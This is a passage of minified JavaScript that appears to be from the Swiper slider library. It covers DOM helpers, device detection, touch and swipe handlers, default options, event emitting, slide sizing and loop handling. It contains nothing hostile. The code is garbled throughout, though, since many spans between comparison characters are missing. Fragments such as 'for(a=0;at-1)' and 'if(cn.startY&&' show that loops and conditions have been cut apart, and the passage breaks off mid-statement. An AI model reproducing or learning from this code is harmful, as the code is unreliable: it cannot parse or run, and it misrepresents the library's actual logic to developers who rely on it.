this[0]?e.getComputedStyle(this[0],null):{}},offset:function(){if(this.length>0){var e=o(),t=r(),a=this[0],i=a.getBoundingClientRect(),s=t.body,n=a.clientTop||s.clientTop||0,l=a.clientLeft||s.clientLeft||0,d=a===e?e.scrollY:a.scrollTop,p=a===e?e.scrollX:a.scrollLeft;return{top:i.top+d-n,left:i.left+p-l}}return null},css:function(e,t){var a,i=o();if(1===arguments.length){if("string"!=typeof e){for(a=0;at-1)return m([]);if(e<0){var a=t+e;return m(a<0?[]:[this[a]])}return m([this[e]])},append:function(){for(var e,t=r(),a=0;a=0;a-=1)this[t].insertBefore(s.childNodes[a],this[t].childNodes[0])}else if(e instanceof h)for(a=0;a0?e?this[0].nextElementSibling&&m(this[0].nextElementSibling).is(e)?m([this[0].nextElementSibling]):m([]):this[0].nextElementSibling?m([this[0].nextElementSibling]):m([]):m([])},nextAll:function(e){var t=[],a=this[0];if(!a)return m([]);for(;a.nextElementSibling;){var i=a.nextElementSibling;e?m(i).is(e)&&t.push(i):t.push(i),a=i}return m(t)},prev:function(e){if(this.length>0){var t=this[0];return e?t.previousElementSibling&&m(t.previousElementSibling).is(e)?m([t.previousElementSibling]):m([]):t.previousElementSibling?m([t.previousElementSibling]):m([])}return m([])},prevAll:function(e){var t=[],a=this[0];if(!a)return m([]);for(;a.previousElementSibling;){var i=a.previousElementSibling;e?m(i).is(e)&&t.push(i):t.push(i),a=i}return m(t)},parent:function(e){for(var t=[],a=0;a6&&(i=i.split(", ").map((function(e){return e.replace(",",".")})).join(", ")),s=new r.WebKitCSSMatrix("none"===i?"":i)):a=(s=n.MozTransform||n.OTransform||n.MsTransform||n.msTransform||n.transform||n.getPropertyValue("transform").replace("translate(","matrix(1, 0, 0, 1,")).toString().split(","),"x"===t&&(i=r.WebKitCSSMatrix?s.m41:16===a.length?parseFloat(a[12]):parseFloat(a[4])),"y"===t&&(i=r.WebKitCSSMatrix?s.m42:16===a.length?parseFloat(a[13]):parseFloat(a[5])),i||0}function S(e){return"object"==typeof e&&null!==e&&e.constructor&&"Object"===Object.prototype.toString.call(e).slice(8,-1)}function C(){for(var e=Object(arguments.length<=0?void 0:arguments[0]),t=["__proto__","constructor","prototype"],a=1;a=0,observer:"MutationObserver"in e||"WebkitMutationObserver"in e,passiveListener:function(){var t=!1;try{var a=Object.defineProperty({},"passive",{get:function(){t=!0}});e.addEventListener("testPassiveListener",null,a)}catch(e){}return t}(),gestures:"ongesturestart"in e}}()),g}function k(e){return void 0===e&&(e={}),b||(b=function(e){var t=(void 0===e?{}:e).userAgent,a=P(),i=o(),s=i.navigator.platform,r=t||i.navigator.userAgent,n={ios:!1,android:!1},l=i.screen.width,d=i.screen.height,p=r.match(/(Android);?[\s\/]+([\d.]+)?/),c=r.match(/(iPad).*OS\s([\d_]+)/),u=r.match(/(iPod)(.*OS\s([\d_]+))?/),h=!c&&r.match(/(iPhone\sOS|iOS)\s([\d_]+)/),v="Win32"===s,f="MacIntel"===s;return!c&&f&&a.touch&&["1024x1366","1366x1024","834x1194","1194x834","834x1112","1112x834","768x1024","1024x768","820x1180","1180x820","810x1080","1080x810"].indexOf(l+"x"+d)>=0&&((c=r.match(/(Version)\/([\d.]+)/))||(c=[0,1,"13_0_0"]),f=!1),p&&!v&&(n.os="android",n.android=!0),(c||h||u)&&(n.os="ios",n.ios=!0),n}(e)),b}function L(){return w||(w=function(){var e,t=o();return{isEdge:!!t.navigator.userAgent.match(/Edge/g),isSafari:(e=t.navigator.userAgent.toLowerCase(),e.indexOf("safari")>=0&&e.indexOf("chrome")<0&&e.indexOf("android")<0),isWebView:/(iPhone|iPod|iPad).*AppleWebKit(?!.*Safari)/i.test(t.navigator.userAgent)}}()),w}Object.keys(y).forEach((function(e){Object.defineProperty(m.fn,e,{value:y[e],writable:!0})}));var $={name:"resize",create:function(){var e=this;C(e,{resize:{observer:null,createObserver:function(){e&&!e.destroyed&&e.initialized&&(e.resize.observer=new ResizeObserver((function(t){var a=e.width,i=e.height,s=a,r=i;t.forEach((function(t){var a=t.contentBoxSize,i=t.contentRect,n=t.target;n&&n!==e.el||(s=i?i.width:(a[0]||a).inlineSize,r=i?i.height:(a[0]||a).blockSize)})),s===a&&r===i||e.resize.resizeHandler()})),e.resize.observer.observe(e.el))},removeObserver:function(){e.resize.observer&&e.resize.observer.unobserve&&e.el&&(e.resize.observer.unobserve(e.el),e.resize.observer=null)},resizeHandler:function(){e&&!e.destroyed&&e.initialized&&(e.emit("beforeResize"),e.emit("resize"))},orientationChangeHandler:function(){e&&!e.destroyed&&e.initialized&&e.emit("orientationchange")}}})},on:{init:function(e){var t=o();e.params.resizeObserver&&void 0!==o().ResizeObserver?e.resize.createObserver():(t.addEventListener("resize",e.resize.resizeHandler),t.addEventListener("orientationchange",e.resize.orientationChangeHandler))},destroy:function(e){var t=o();e.resize.removeObserver(),t.removeEventListener("resize",e.resize.resizeHandler),t.removeEventListener("orientationchange",e.resize.orientationChangeHandler)}}},I={attach:function(e,t){void 0===t&&(t={});var a=o(),i=this,s=new(a.MutationObserver||a.WebkitMutationObserver)((function(e){if(1!==e.length){var t=function(){i.emit("observerUpdate",e[0])};a.requestAnimationFrame?a.requestAnimationFrame(t):a.setTimeout(t,0)}else i.emit("observerUpdate",e[0])}));s.observe(e,{attributes:void 0===t.attributes||t.attributes,childList:void 0===t.childList||t.childList,characterData:void 0===t.characterData||t.characterData}),i.observer.observers.push(s)},init:function(){var e=this;if(e.support.observer&&e.params.observer){if(e.params.observeParents)for(var t=e.$el.parents(),a=0;a0))if(!s.isTouched||!s.isMoved)if(!!n.noSwipingClass&&""!==n.noSwipingClass&&d.target&&d.target.shadowRoot&&e.path&&e.path[0]&&(p=m(e.path[0])),n.noSwiping&&p.closest(n.noSwipingSelector?n.noSwipingSelector:"."+n.noSwipingClass)[0])t.allowClick=!0;else if(!n.swipeHandler||p.closest(n.swipeHandler)[0]){l.currentX="touchstart"===d.type?d.targetTouches[0].pageX:d.pageX,l.currentY="touchstart"===d.type?d.targetTouches[0].pageY:d.pageY;var c=l.currentX,u=l.currentY,h=n.edgeSwipeDetection||n.iOSEdgeSwipeDetection,v=n.edgeSwipeThreshold||n.iOSEdgeSwipeThreshold;if(h&&(c<=v||c>=i.innerWidth-v)){if("prevent"!==h)return;e.preventDefault()}if(C(s,{isTouched:!0,isMoved:!1,allowTouchCallbacks:!0,isScrolling:void 0,startMoving:void 0}),l.startX=c,l.startY=u,s.touchStartTime=x(),t.allowClick=!0,t.updateSize(),t.swipeDirection=void 0,n.threshold>0&&(s.allowThresholdMove=!1),"touchstart"!==d.type){var f=!0;p.is(s.formElements)&&(f=!1),a.activeElement&&m(a.activeElement).is(s.formElements)&&a.activeElement!==p[0]&&a.activeElement.blur();var g=f&&t.allowTouchMove&&n.touchStartPreventDefault;!n.touchStartForcePreventDefault&&!g||p[0].isContentEditable||d.preventDefault()}t.emit("touchStart",d)}}}function D(e){var t=r(),a=this,i=a.touchEventsData,s=a.params,n=a.touches,o=a.rtlTranslate,l=e;if(l.originalEvent&&(l=l.originalEvent),i.isTouched){if(!i.isTouchEvent||"touchmove"===l.type){var d="touchmove"===l.type&&l.targetTouches&&(l.targetTouches[0]||l.changedTouches[0]),p="touchmove"===l.type?d.pageX:l.pageX,c="touchmove"===l.type?d.pageY:l.pageY;if(l.preventedByNestedSwiper)return n.startX=p,void(n.startY=c);if(!a.allowTouchMove)return a.allowClick=!1,void(i.isTouched&&(C(n,{startX:p,startY:c,currentX:p,currentY:c}),i.touchStartTime=x()));if(i.isTouchEvent&&s.touchReleaseOnEdges&&!s.loop)if(a.isVertical()){if(cn.startY&&a.translate>=a.minTranslate())return i.isTouched=!1,void(i.isMoved=!1)}else if(pn.startX&&a.translate>=a.minTranslate())return;if(i.isTouchEvent&&t.activeElement&&l.target===t.activeElement&&m(l.target).is(i.formElements))return i.isMoved=!0,void(a.allowClick=!1);if(i.allowTouchCallbacks&&a.emit("touchMove",l),!(l.targetTouches&&l.targetTouches.length>1)){n.currentX=p,n.currentY=c;var u=n.currentX-n.startX,h=n.currentY-n.startY;if(!(a.params.threshold&&Math.sqrt(Math.pow(u,2)+Math.pow(h,2))=25&&(v=180*Math.atan2(Math.abs(h),Math.abs(u))/Math.PI,i.isScrolling=a.isHorizontal()?v>s.touchAngle:90-v>s.touchAngle);if(i.isScrolling&&a.emit("touchMoveOpposite",l),void 0===i.startMoving&&(n.currentX===n.startX&&n.currentY===n.startY||(i.startMoving=!0)),i.isScrolling)i.isTouched=!1;else if(i.startMoving){a.allowClick=!1,!s.cssMode&&l.cancelable&&l.preventDefault(),s.touchMoveStopPropagation&&!s.nested&&l.stopPropagation(),i.isMoved||(s.loop&&a.loopFix(),i.startTranslate=a.getTranslate(),a.setTransition(0),a.animating&&a.$wrapperEl.trigger("webkitTransitionEnd transitionend"),i.allowMomentumBounce=!1,!s.grabCursor||!0!==a.allowSlideNext&&!0!==a.allowSlidePrev||a.setGrabCursor(!0),a.emit("sliderFirstMove",l)),a.emit("sliderMove",l),i.isMoved=!0;var f=a.isHorizontal()?u:h;n.diff=f,f*=s.touchRatio,o&&(f=-f),a.swipeDirection=f>0?"prev":"next",i.currentTranslate=f+i.startTranslate;var g=!0,b=s.resistanceRatio;if(s.touchReleaseOnEdges&&(b=0),f>0&&i.currentTranslate>a.minTranslate()?(g=!1,s.resistance&&(i.currentTranslate=a.minTranslate()-1+Math.pow(-a.minTranslate()+i.startTranslate+f,b))):f<0&&i.currentTranslatei.startTranslate&&(i.currentTranslate=i.startTranslate),a.allowSlidePrev||a.allowSlideNext||(i.currentTranslate=i.startTranslate),s.threshold>0){if(!(Math.abs(f)>s.threshold||i.allowThresholdMove))return void(i.currentTranslate=i.startTranslate);if(!i.allowThresholdMove)return i.allowThresholdMove=!0,n.startX=n.currentX,n.startY=n.currentY,i.currentTranslate=i.startTranslate,void(n.diff=a.isHorizontal()?n.currentX-n.startX:n.currentY-n.startY)}s.followFinger&&!s.cssMode&&((s.freeMode||s.watchSlidesProgress||s.watchSlidesVisibility)&&(a.updateActiveIndex(),a.updateSlidesClasses()),s.freeMode&&(0===i.velocities.length&&i.velocities.push({position:n[a.isHorizontal()?"startX":"startY"],time:i.touchStartTime}),i.velocities.push({position:n[a.isHorizontal()?"currentX":"currentY"],time:x()})),a.updateProgress(i.currentTranslate),a.setTranslate(i.currentTranslate))}}}}}else i.startMoving&&i.isScrolling&&a.emit("touchMoveOpposite",l)}function N(e){var t=this,a=t.touchEventsData,i=t.params,s=t.touches,r=t.rtlTranslate,n=t.$wrapperEl,o=t.slidesGrid,l=t.snapGrid,d=e;if(d.originalEvent&&(d=d.originalEvent),a.allowTouchCallbacks&&t.emit("touchEnd",d),a.allowTouchCallbacks=!1,!a.isTouched)return a.isMoved&&i.grabCursor&&t.setGrabCursor(!1),a.isMoved=!1,void(a.startMoving=!1);i.grabCursor&&a.isMoved&&a.isTouched&&(!0===t.allowSlideNext||!0===t.allowSlidePrev)&&t.setGrabCursor(!1);var p,c=x(),u=c-a.touchStartTime;if(t.allowClick&&(t.updateClickedSlide(d),t.emit("tap click",d),u<300&&c-a.lastClickTime<300&&t.emit("doubleTap doubleClick",d)),a.lastClickTime=x(),E((function(){t.destroyed||(t.allowClick=!0)})),!a.isTouched||!a.isMoved||!t.swipeDirection||0===s.diff||a.currentTranslate===a.startTranslate)return a.isTouched=!1,a.isMoved=!1,void(a.startMoving=!1);if(a.isTouched=!1,a.isMoved=!1,a.startMoving=!1,p=i.followFinger?r?t.translate:-t.translate:-a.currentTranslate,!i.cssMode)if(i.freeMode){if(p<-t.minTranslate())return void t.slideTo(t.activeIndex);if(p>-t.maxTranslate())return void(t.slides.length1){var h=a.velocities.pop(),v=a.velocities.pop(),f=h.position-v.position,m=h.time-v.time;t.velocity=f/m,t.velocity/=2,Math.abs(t.velocity)150||x()-h.time>300)&&(t.velocity=0)}else t.velocity=0;t.velocity*=i.freeModeMomentumVelocityRatio,a.velocities.length=0;var g=1e3*i.freeModeMomentumRatio,b=t.velocity*g,w=t.translate+b;r&&(w=-w);var y,T,S=!1,C=20*Math.abs(t.velocity)*i.freeModeMomentumBounceRatio;if(wt.minTranslate())i.freeModeMomentumBounce?(w-t.minTranslate()>C&&(w=t.minTranslate()+C),y=t.minTranslate(),S=!0,a.allowMomentumBounce=!0):w=t.minTranslate(),i.loop&&i.centeredSlides&&(T=!0);else if(i.freeModeSticky){for(var M,z=0;z-w){M=z;break}w=-(w=Math.abs(l[M]-w)=i.longSwipesMs)&&(t.updateProgress(),t.updateActiveIndex(),t.updateSlidesClasses())}else{for(var L=0,$=t.slidesSizesGrid[0],I=0;I=o[I]&&p=o[I]&&(L=I,$=o[o.length-1]-o[o.length-2])}var A=(p-o[L])/$,D=Li.longSwipesMs){if(!i.longSwipes)return void t.slideTo(t.activeIndex);"next"===t.swipeDirection&&(A>=i.longSwipesRatio?t.slideTo(L+D):t.slideTo(L)),"prev"===t.swipeDirection&&(A>1-i.longSwipesRatio?t.slideTo(L+D):t.slideTo(L))}else{if(!i.shortSwipes)return void t.slideTo(t.activeIndex);t.navigation&&(d.target===t.navigation.nextEl||d.target===t.navigation.prevEl)?d.target===t.navigation.nextEl?t.slideTo(L+D):t.slideTo(L):("next"===t.swipeDirection&&t.slideTo(L+D),"prev"===t.swipeDirection&&t.slideTo(L))}}}function G(){var e=this,t=e.params,a=e.el;if(!a||0!==a.offsetWidth){t.breakpoints&&e.setBreakpoint();var i=e.allowSlideNext,s=e.allowSlidePrev,r=e.snapGrid;e.allowSlideNext=!0,e.allowSlidePrev=!0,e.updateSize(),e.updateSlides(),e.updateSlidesClasses(),("auto"===t.slidesPerView||t.slidesPerView>1)&&e.isEnd&&!e.isBeginning&&!e.params.centeredSlides?e.slideTo(e.slides.length-1,0,!1,!0):e.slideTo(e.activeIndex,0,!1,!0),e.autoplay&&e.autoplay.running&&e.autoplay.paused&&e.autoplay.run(),e.allowSlidePrev=s,e.allowSlideNext=i,e.params.watchOverflow&&r!==e.snapGrid&&e.checkOverflow()}}function B(e){var t=this;t.allowClick||(t.params.preventClicks&&e.preventDefault(),t.params.preventClicksPropagation&&t.animating&&(e.stopPropagation(),e.stopImmediatePropagation()))}function H(){var e=this,t=e.wrapperEl,a=e.rtlTranslate;e.previousTranslate=e.translate,e.isHorizontal()?e.translate=a?t.scrollWidth-t.offsetWidth-t.scrollLeft:-t.scrollLeft:e.translate=-t.scrollTop,-0===e.translate&&(e.translate=0),e.updateActiveIndex(),e.updateSlidesClasses();var i=e.maxTranslate()-e.minTranslate();(0===i?0:(e.translate-e.minTranslate())/i)!==e.progress&&e.updateProgress(a?-e.translate:e.translate),e.emit("setTranslate",e.translate,!1)}var X=!1;function Y(){}var R={init:!0,direction:"horizontal",touchEventsTarget:"container",initialSlide:0,speed:300,cssMode:!1,updateOnWindowResize:!0,resizeObserver:!1,nested:!1,width:null,height:null,preventInteractionOnTransition:!1,userAgent:null,url:null,edgeSwipeDetection:!1,edgeSwipeThreshold:20,freeMode:!1,freeModeMomentum:!0,freeModeMomentumRatio:1,freeModeMomentumBounce:!0,freeModeMomentumBounceRatio:1,freeModeMomentumVelocityRatio:1,freeModeSticky:!1,freeModeMinimumVelocity:.02,autoHeight:!1,setWrapperSize:!1,virtualTranslate:!1,effect:"slide",breakpoints:void 0,breakpointsBase:"window",spaceBetween:0,slidesPerView:1,slidesPerColumn:1,slidesPerColumnFill:"column",slidesPerGroup:1,slidesPerGroupSkip:0,centeredSlides:!1,centeredSlidesBounds:!1,slidesOffsetBefore:0,slidesOffsetAfter:0,normalizeSlideIndex:!0,centerInsufficientSlides:!1,watchOverflow:!1,roundLengths:!1,touchRatio:1,touchAngle:45,simulateTouch:!0,shortSwipes:!0,longSwipes:!0,longSwipesRatio:.5,longSwipesMs:300,followFinger:!0,allowTouchMove:!0,threshold:0,touchMoveStopPropagation:!1,touchStartPreventDefault:!0,touchStartForcePreventDefault:!1,touchReleaseOnEdges:!1,uniqueNavElements:!0,resistance:!0,resistanceRatio:.85,watchSlidesProgress:!1,watchSlidesVisibility:!1,grabCursor:!1,preventClicks:!0,preventClicksPropagation:!0,slideToClickedSlide:!1,preloadImages:!0,updateOnImagesReady:!0,loop:!1,loopAdditionalSlides:0,loopedSlides:null,loopFillGroupWithBlank:!1,loopPreventsSlide:!0,allowSlidePrev:!0,allowSlideNext:!0,swipeHandler:null,noSwiping:!0,noSwipingClass:"swiper-no-swiping",noSwipingSelector:null,passiveListeners:!0,containerModifierClass:"swiper-container-",slideClass:"swiper-slide",slideBlankClass:"swiper-slide-invisible-blank",slideActiveClass:"swiper-slide-active",slideDuplicateActiveClass:"swiper-slide-duplicate-active",slideVisibleClass:"swiper-slide-visible",slideDuplicateClass:"swiper-slide-duplicate",slideNextClass:"swiper-slide-next",slideDuplicateNextClass:"swiper-slide-duplicate-next",slidePrevClass:"swiper-slide-prev",slideDuplicatePrevClass:"swiper-slide-duplicate-prev",wrapperClass:"swiper-wrapper",runCallbacksOnInit:!0,_emitClasses:!1},V={modular:{useParams:function(e){var t=this;t.modules&&Object.keys(t.modules).forEach((function(a){var i=t.modules[a];i.params&&C(e,i.params)}))},useModules:function(e){void 0===e&&(e={});var t=this;t.modules&&Object.keys(t.modules).forEach((function(a){var i=t.modules[a],s=e[a]||{};i.on&&t.on&&Object.keys(i.on).forEach((function(e){t.on(e,i.on[e])})),i.create&&i.create.bind(t)(s)}))}},eventsEmitter:{on:function(e,t,a){var i=this;if("function"!=typeof t)return i;var s=a?"unshift":"push";return e.split(" ").forEach((function(e){i.eventsListeners[e]||(i.eventsListeners[e]=[]),i.eventsListeners[e][s](t)})),i},once:function(e,t,a){var i=this;if("function"!=typeof t)return i;function s(){i.off(e,s),s.__emitterProxy&&delete s.__emitterProxy;for(var a=arguments.length,r=new Array(a),n=0;n=0&&t.eventsAnyListeners.splice(a,1),t},off:function(e,t){var a=this;return a.eventsListeners?(e.split(" ").forEach((function(e){void 0===t?a.eventsListeners[e]=[]:a.eventsListeners[e]&&a.eventsListeners[e].forEach((function(i,s){(i===t||i.__emitterProxy&&i.__emitterProxy===t)&&a.eventsListeners[e].splice(s,1)}))})),a):a},emit:function(){var e,t,a,i=this;if(!i.eventsListeners)return i;for(var s=arguments.length,r=new Array(s),n=0;n=0&&(w=parseFloat(w.replace("%",""))/100*r),e.virtualSize=-w,n?p.css({marginLeft:"",marginTop:""}):p.css({marginRight:"",marginBottom:""}),i.slidesPerColumn>1&&(T=Math.floor(c/i.slidesPerColumn)===c/e.params.slidesPerColumn?c:Math.ceil(c/i.slidesPerColumn)*i.slidesPerColumn,"auto"!==i.slidesPerView&&"row"===i.slidesPerColumnFill&&(T=Math.max(T,i.slidesPerView*i.slidesPerColumn)));for(var M,z,P,k=i.slidesPerColumn,L=T/k,$=Math.floor(c/i.slidesPerColumn),I=0;I1){var A=void 0,D=void 0,N=void 0;if("row"===i.slidesPerColumnFill&&i.slidesPerGroup>1){var G=Math.floor(I/(i.slidesPerGroup*i.slidesPerColumn)),B=I-i.slidesPerColumn*i.slidesPerGroup*G,H=0===G?i.slidesPerGroup:Math.min(Math.ceil((c-G*k*i.slidesPerGroup)/k),i.slidesPerGroup);A=(D=B-(N=Math.floor(B/H))*H+G*i.slidesPerGroup)+N*T/k,O.css({"-webkit-box-ordinal-group":A,"-moz-box-ordinal-group":A,"-ms-flex-order":A,"-webkit-order":A,order:A})}else"column"===i.slidesPerColumnFill?(N=I-(D=Math.floor(I/k))*k,(D>$||D===$&&N===k-1)&&(N+=1)>=k&&(N=0,D+=1)):D=I-(N=Math.floor(I/L))*L;O.css(t("margin-top"),0!==N&&i.spaceBetween&&i.spaceBetween+"px")}if("none"!==O.css("display")){if("auto"===i.slidesPerView){var X=getComputedStyle(O[0]),Y=O[0].style.transform,R=O[0].style.webkitTransform;if(Y&&(O[0].style.transform="none"),R&&(O[0].style.webkitTransform="none"),i.roundLengths)S=e.isHorizontal()?O.outerWidth(!0):O.outerHeight(!0);else{var V=a(X,"width"),W=a(X,"padding-left"),F=a(X,"padding-right"),_=a(X,"margin-left"),q=a(X,"margin-right"),j=X.getPropertyValue("box-sizing");if(j&&"border-box"===j)S=V+_+q;else{var U=O[0],K=U.clientWidth;S=V+W+F+_+q+(U.offsetWidth-K)}}Y&&(O[0].style.transform=Y),R&&(O[0].style.webkitTransform=R),i.roundLengths&&(S=Math.floor(S))}else S=(r-(i.slidesPerView-1)*w)/i.slidesPerView,i.roundLengths&&(S=Math.floor(S)),p[I]&&(p[I].style[t("width")]=S+"px");p[I]&&(p[I].swiperSlideSize=S),v.push(S),i.centeredSlides?(y=y+S/2+E/2+w,0===E&&0!==I&&(y=y-r/2-w),0===I&&(y=y-r/2-w),Math.abs(y)<.001&&(y=0),i.roundLengths&&(y=Math.floor(y)),x%i.slidesPerGroup==0&&u.push(y),h.push(y)):(i.roundLengths&&(y=Math.floor(y)),(x-Math.min(e.params.slidesPerGroupSkip,x))%e.params.slidesPerGroup==0&&u.push(y),h.push(y),y=y+S+w),e.virtualSize+=S+w,E=S,x+=1}}if(e.virtualSize=Math.max(e.virtualSize,r)+m,n&&o&&("slide"===i.effect||"coverflow"===i.effect)&&s.css({width:e.virtualSize+i.spaceBetween+"px"}),i.setWrapperSize)s.css(((z={})[t("width")]=e.virtualSize+i.spaceBetween+"px",z));if(i.slidesPerColumn>1)if(e.virtualSize=(S+i.spaceBetween)*T,e.virtualSize=Math.ceil(e.virtualSize/i.slidesPerColumn)-i.spaceBetween,s.css(((P={})[t("width")]=e.virtualSize+i.spaceBetween+"px",P)),i.centeredSlides){M=[];for(var Z=0;Z1&&u.push(e.virtualSize-r)}if(0===u.length&&(u=[0]),0!==i.spaceBetween){var te,ae=e.isHorizontal()&&n?"marginLeft":t("marginRight");p.filter((function(e,t){return!i.cssMode||t!==p.length-1})).css(((te={})[ae]=w+"px",te))}if(i.centeredSlides&&i.centeredSlidesBounds){var ie=0;v.forEach((function(e){ie+=e+(i.spaceBetween?i.spaceBetween:0)}));var se=(ie-=i.spaceBetween)-r;u=u.map((function(e){return e<0?-f:e>se?se+m:e}))}if(i.centerInsufficientSlides){var re=0;if(v.forEach((function(e){re+=e+(i.spaceBetween?i.spaceBetween:0)})),(re-=i.spaceBetween)1)if(a.params.centeredSlides)a.visibleSlides.each((function(e){i.push(e)}));else for(t=0;ta.slides.length)break;i.push(a.slides.eq(r)[0])}else i.push(a.slides.eq(a.activeIndex)[0]);for(t=0;ts?n:s}s&&a.$wrapperEl.css("height",s+"px")},updateSlidesOffset:function(){for(var e=this.slides,t=0;t=0&&d1&&p<=t.size||d<=0&&p>=t.size)&&(t.visibleSlides.push(o),t.visibleSlidesIndexes.push(n),i.eq(n).addClass(a.slideVisibleClass))}o.progress=s?-l:l}t.visibleSlides=m(t.visibleSlides)}},updateProgress:function(e){var t=this;if(void 0===e){var a=t.rtlTranslate?-1:1;e=t&&t.translate&&t.translate*a||0}var i=t.params,s=t.maxTranslate()-t.minTranslate(),r=t.progress,n=t.isBeginning,o=t.isEnd,l=n,d=o;0===s?(r=0,n=!0,o=!0):(n=(r=(e-t.minTranslate())/s)<=0,o=r>=1),C(t,{progress:r,isBeginning:n,isEnd:o}),(i.watchSlidesProgress||i.watchSlidesVisibility||i.centeredSlides&&i.autoHeight)&&t.updateSlidesProgress(e),n&&!l&&t.emit("reachBeginning toEdge"),o&&!d&&t.emit("reachEnd toEdge"),(l&&!n||d&&!o)&&t.emit("fromEdge"),t.emit("progress",r)},updateSlidesClasses:function(){var e,t=this,a=t.slides,i=t.params,s=t.$wrapperEl,r=t.activeIndex,n=t.realIndex,o=t.virtual&&i.virtual.enabled;a.removeClass(i.slideActiveClass+" "+i.slideNextClass+" "+i.slidePrevClass+" "+i.slideDuplicateActiveClass+" "+i.slideDuplicateNextClass+" "+i.slideDuplicatePrevClass),(e=o?t.$wrapperEl.find("."+i.slideClass+'[data-swiper-slide-index="'+r+'"]'):a.eq(r)).addClass(i.slideActiveClass),i.loop&&(e.hasClass(i.slideDuplicateClass)?s.children("."+i.slideClass+":not(."+i.slideDuplicateClass+')[data-swiper-slide-index="'+n+'"]').addClass(i.slideDuplicateActiveClass):s.children("."+i.slideClass+"."+i.slideDuplicateClass+'[data-swiper-slide-index="'+n+'"]').addClass(i.slideDuplicateActiveClass));var l=e.nextAll("."+i.slideClass).eq(0).addClass(i.slideNextClass);i.loop&&0===l.length&&(l=a.eq(0)).addClass(i.slideNextClass);var d=e.prevAll("."+i.slideClass).eq(0).addClass(i.slidePrevClass);i.loop&&0===d.length&&(d=a.eq(-1)).addClass(i.slidePrevClass),i.loop&&(l.hasClass(i.slideDuplicateClass)?s.children("."+i.slideClass+":not(."+i.slideDuplicateClass+')[data-swiper-slide-index="'+l.attr("data-swiper-slide-index")+'"]').addClass(i.slideDuplicateNextClass):s.children("."+i.slideClass+"."+i.slideDuplicateClass+'[data-swiper-slide-index="'+l.attr("data-swiper-slide-index")+'"]').addClass(i.slideDuplicateNextClass),d.hasClass(i.slideDuplicateClass)?s.children("."+i.slideClass+":not(."+i.slideDuplicateClass+')[data-swiper-slide-index="'+d.attr("data-swiper-slide-index")+'"]').addClass(i.slideDuplicatePrevClass):s.children("."+i.slideClass+"."+i.slideDuplicateClass+'[data-swiper-slide-index="'+d.attr("data-swiper-slide-index")+'"]').addClass(i.slideDuplicatePrevClass)),t.emitSlidesClasses()},updateActiveIndex:function(e){var t,a=this,i=a.rtlTranslate?a.translate:-a.translate,s=a.slidesGrid,r=a.snapGrid,n=a.params,o=a.activeIndex,l=a.realIndex,d=a.snapIndex,p=e;if(void 0===p){for(var c=0;c=s[c]&&i=s[c]&&i=s[c]&&(p=c);n.normalizeSlideIndex&&(p<0||void 0===p)&&(p=0)}if(r.indexOf(i)>=0)t=r.indexOf(i);else{var u=Math.min(n.slidesPerGroupSkip,p);t=u+Math.floor((p-u)/n.slidesPerGroup)}if(t>=r.length&&(t=r.length-1),p!==o){var h=parseInt(a.slides.eq(p).attr("data-swiper-slide-index")||p,10);C(a,{snapIndex:t,realIndex:h,previousIndex:o,activeIndex:p}),a.emit("activeIndexChange"),a.emit("snapIndexChange"),l!==h&&a.emit("realIndexChange"),(a.initialized||a.params.runCallbacksOnInit)&&a.emit("slideChange")}else t!==d&&(a.snapIndex=t,a.emit("snapIndexChange"))},updateClickedSlide:function(e){var t,a=this,i=a.params,s=m(e.target).closest("."+i.slideClass)[0],r=!1;if(s)for(var n=0;nd?d:i&&er?"next":is?"next":i=l.length&&(f=l.length-1),(c||o.initialSlide||0)===(p||0)&&a&&r.emit("beforeSlideChangeStart");var m,g=-l[f];if(r.updateProgress(g),o.normalizeSlideIndex)for(var b=0;b=y&&w=y&&w=y&&(n=b)}if(r.initialized&&n!==c){if(!r.allowSlideNext&&gr.translate&&g>r.maxTranslate()&&(c||0)!==n)return!1}if(m=n>c?"next":n=e&&(h=e)})),void 0!==h&&(u=o.indexOf(h))<0&&(u=i.activeIndex-1),i.slideTo(u,e,t,a)},slideReset:function(e,t,a){return void 0===e&&(e=this.params.speed),void 0===t&&(t=!0),this.slideTo(this.activeIndex,e,t,a)},slideToClosest:function(e,t,a,i){void 0===e&&(e=this.params.speed),void 0===t&&(t=!0),void 0===i&&(i=.5);var s=this,r=s.activeIndex,n=Math.min(s.params.slidesPerGroupSkip,r),o=n+Math.floor((r-n)/s.params.slidesPerGroup),l=s.rtlTranslate?s.translate:-s.translate;if(l>=s.snapGrid[o]){var d=s.snapGrid[o];l-d>(s.snapGrid[o+1]-d)*i&&(r+=s.params.slidesPerGroup)}else{var p=s.snapGrid[o-1];l-p<=(s.snapGrid[o]-p)*i&&(r-=s.params.slidesPerGroup)}return r=Math.max(r,0),r=Math.min(r,s.slidesGrid.length-1),s.slideTo(r,e,t,a)},slideToClickedSlide:function(){var e,t=this,a=t.params,i=t.$wrapperEl,s="auto"===a.slidesPerView?t.slidesPerViewDynamic():a.slidesPerView,r=t.clickedIndex;if(a.loop){if(t.animating)return;e=parseInt(m(t.clickedSlide).attr("data-swiper-slide-index"),10),a.centeredSlides?rt.slides.length-t.loopedSlides+s/2?(t.loopFix(),r=i.children("."+a.slideClass+'[data-swiper-slide-index="'+e+'"]:not(.'+a.slideDuplicateClass+")").eq(0).index(),E((function(){t.slideTo(r)}))):t.slideTo(r):r>t.slides.length-s?(t.loopFix(),r=i.children("."+a.slideClass+'[data-swiper-slide-index="'+e+'"]:not(.'+a.slideDuplicateClass+")").eq(0).index(),E((function(){t.slideTo(r)}))):t.slideTo(r)}else t.slideTo(r)}},loop:{loopCreate:function(){var e=this,t=r(),a=e.params,i=e.$wrapperEl;i.children("."+a.slideClass+"."+a.slideDuplicateClass).remove();var s=i.children("."+a.slideClass);if(a.loopFillGroupWithBlank){var n=a.slidesPerGroup-s.length%a.slidesPerGroup;if(n!==a.slidesPerGroup){for(var o=0;os.length&&(e.loopedSlides=s.length);var d=[],p=[];s.each((function(t,a){var i=m(t);a=s.length-e.loopedSlides&&d.push(t),i.attr("data-swiper-slide-index",a)}));for(var c=0;c=0;u-=1)i.prepend(m(d[u].cloneNode(!0)).addClass(a.slideDuplicateClass))},loopFix:function(){var e=this;e.emit("beforeLoopFix");var t,a=e.activeIndex,i=e.slides,s=e.loopedSlides,r=e.allowSlidePrev,n=e.allowSlideNext,o=e.snapGrid,l=e.rtlTranslate;e.allowSlidePrev=!0,e.allowSlideNext=!0;var d=-o[a]-e.getTranslate();if(a=i.length-s){t=-i.length+a+s,t+=s,e.slideTo(t,0,!1,!0)&&0!==d&&e.setTranslate((l?-e.translate:e.translate)-d)}e.allowSlidePrev=r,e.allowSlideNext=n,e.emit("loopFix")},loopDestroy:function(){var 